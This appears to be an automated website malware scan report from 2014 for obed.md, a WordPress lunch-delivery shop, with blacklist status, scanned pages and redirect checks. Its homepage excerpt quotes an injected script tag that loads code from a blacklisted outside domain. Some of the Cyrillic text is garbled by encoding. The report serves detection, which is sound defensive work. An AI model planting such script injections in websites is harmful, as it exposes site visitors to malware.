Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=obed.md
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://obed.md/ | 200 OK Content-Length: 4509 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: lamda.be ...[933 bytes skipped]... /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://obed.md/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://obed.md/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 3.8.4" /> <!-- WooCommerce Version --> <meta name="generator" content="WooCommerce 2.0.20" /> <script type="text/javascript" src="http://lamda.be/mvbv9px6.php?id=13220543"></script> </head> <body> <div id="wrapper"> <div id="header"> <div class="logo"> </div> </div> <div id="bar"> <h1>ÐоÑÑавка обедов в оÑиÑ. </br> </h1> </div><div id="menu"> <div class="day-menu"> <div class="date"> <p>5 ...[3883 bytes skipped]... | ||
http://obed.md/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://obed.md/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://lamda.be/mvbv9px6.php?id=13220543 | 404 Not Found Content-Length: 210 Content-Type: text/html | clean |
http://lamda.be/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: obed.md
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 09:44:24 GMT
Server: LiteSpeed
Vary: User-Agent
Content-Length: 4509
Content-Type: text/html; charset=UTF-8
Set-Cookie: wc_session_cookie_48f099fb3f6927e37a3507b63df72ab9=ZGnaVy5p3ftQmNpaHlBcXzf8vd2TmGPx%7C%7C1410947063%7C%7C1410943463%7C%7C0bcd44e3efa6f51ff4cdd4cd35a2f7e9; expires=Wed, 17-Sep-2014 09:44:23 GMT; path=/; httponly
Set-Cookie: woocommerce_items_in_cart=0; expires=Mon, 15-Sep-2014 08:44:23 GMT; path=/
Set-Cookie: woocommerce_cart_hash=0; expires=Mon, 15-Sep-2014 08:44:23 GMT; path=/
X-Pingback: http://obed.md/xmlrpc.php
...4509 bytes of data.
GET / HTTP/1.1
Host: obed.md
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 09:44:24 GMT
Server: LiteSpeed
Vary: User-Agent
Content-Length: 4509
Content-Type: text/html; charset=UTF-8
Set-Cookie: wc_session_cookie_48f099fb3f6927e37a3507b63df72ab9=ZGnaVy5p3ftQmNpaHlBcXzf8vd2TmGPx%7C%7C1410947063%7C%7C1410943463%7C%7C0bcd44e3efa6f51ff4cdd4cd35a2f7e9; expires=Wed, 17-Sep-2014 09:44:23 GMT; path=/; httponly
Set-Cookie: woocommerce_items_in_cart=0; expires=Mon, 15-Sep-2014 08:44:23 GMT; path=/
Set-Cookie: woocommerce_cart_hash=0; expires=Mon, 15-Sep-2014 08:44:23 GMT; path=/
X-Pingback: http://obed.md/xmlrpc.php
...4509 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: obed.md
Referer: http://www.google.com/search?q=obed.md
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: obed.md
Referer: http://www.google.com/search?q=obed.md
Result:
The result is similar to the first query. There are no suspicious redirects found.